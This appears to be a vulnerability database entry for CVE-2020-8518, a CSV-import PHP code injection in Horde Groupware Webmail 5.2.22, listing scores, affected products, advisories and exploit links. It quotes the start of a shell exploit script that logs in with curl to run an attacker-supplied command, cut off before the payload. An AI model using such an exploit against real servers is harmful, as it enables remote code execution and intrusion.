Published: 17/02/2020 Updated: 07/11/2023

CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10

CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9

VMScore: 755

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Horde Groupware Webmail Edition 5.2.22 allows injection of arbitrary PHP code via CSV data, leading to remote code execution.

Vulnerable Product	Search on Vulmon	Subscribe to Product
horde groupware 5.2.22
fedoraproject fedora 30
fedoraproject fedora 31
debian debian linux 8.0

Debian Bug report logs - #951537 php-horde-data: CVE-2020-8518 Package: src:php-horde-data; Maintainer for src:php-horde-data is Horde Maintainers <team+debian-horde-team@trackerdebianorg>; Reported by: Salvatore Bonaccorso <carnil@debianorg> Date: Mon, 17 Feb 2020 21:18:02 UTC Severity: grave Tags: security, upst ...

#!/bin/sh if [ "$#" -ne 4 ]; then echo '[!] Usage: <url> <username> <password> <command>' 1>&2 exit 1 fi BASE="$1" USERNAME="$2" PASSWORD="$3" COMMAND="$4" JAR="$(mktemp)" trap 'rm -f "$JAR"' EXIT echo "[+] Logging in as $USERNAME:$PASSWORD" 1>&2 curl -si -c "$JAR" "$BASE/loginphp" \ -d 'login_ ...

CWE-94 https://lists.horde.org/archives/announce/2020/001285.html http://packetstormsecurity.com/files/156872/Horde-5.2.22-CSV-Import-Code-Execution.html https://lists.debian.org/debian-lts-announce/2020/04/msg00008.html https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2PRPIFQDGYPQ3F2TF2ETPIL7IYNSVVZQ/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DKTNYDBDVJNMVC7QPXQI7CMPLX3USZ2T/https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=951537 https://nvd.nist.gov https://www.exploit-db.com/exploits/48215

CVE-2020-8518

Vulnerability Summary

Vulnerability Trend

Vendor Advisories

Exploits

References

Vulmon Search

About

Products

Connect